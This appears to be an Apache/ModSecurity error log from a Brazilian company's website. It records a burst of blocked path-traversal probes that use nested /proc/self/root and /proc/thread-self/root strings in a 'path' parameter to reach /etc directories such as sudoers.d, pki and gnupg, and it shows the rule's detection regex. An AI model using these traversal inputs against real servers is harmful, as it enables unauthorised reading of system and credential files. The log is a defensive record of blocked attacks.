[Wed Mar 18 06:54:13.135085 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:51794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Rda6ubjKNq_cu4ZsKAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:54:20.938857 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:51808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2TAkwaGbbGflqUZDnLwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:54:23.344029 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:51282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2T-yqAr6etmhZHNqRlQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:54:23.344878 2026] [mime_magic:error] [pid 31803:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:51282] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:54:24.232988 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:51284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2UCmAPhZkrhU8w4lD5wAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:54:43.991075 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:51292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Y_u8EFLIOrSqIpvbHgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:54:46.387322 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:45322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2ZeyqAr6etmhZHNqRnAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:54:48.703272 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:45330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2aNa6ubjKNq_cu4ZsMgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:54:59.544552 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.241.31:37202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2c0zinOy1jxa1j4fpJQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:55:16.543706 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:36932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2hPu8EFLIOrSqIpvbOAAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:55:22.287033 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:34612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2isdf6f5d65gmYZSo9gAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:55:25.631350 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:52876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2jcdf6f5d65gmYZSo_QAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:55:33.613156 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:52882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2lSmAPhZkrhU8w4lEEgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:55:39.884275 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:43188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2m0zinOy1jxa1j4fpNgAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:55:43.474950 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:34020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2n_u8EFLIOrSqIpvbTgAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:55:50.511536 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:47160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2pimAPhZkrhU8w4lELAAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:55:55.059326 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:60910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2qwkwaGbbGflqUZDnbQAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:55:59.519415 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:60916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2r9a6ubjKNq_cu4ZsQAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:56:14.696330 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:34036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2vkzinOy1jxa1j4fpYAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:56:16.576165 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:47556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2wEzinOy1jxa1j4fpYgAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:56:19.037940 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.241.31:47560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2w0zinOy1jxa1j4fpZAAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:56:45.725162 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:33198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp23eyqAr6etmhZHNqR4wAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:56:56.456393 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:34450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp26NY0UrI5A3LftIxwBwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:56:58.707088 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:55180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 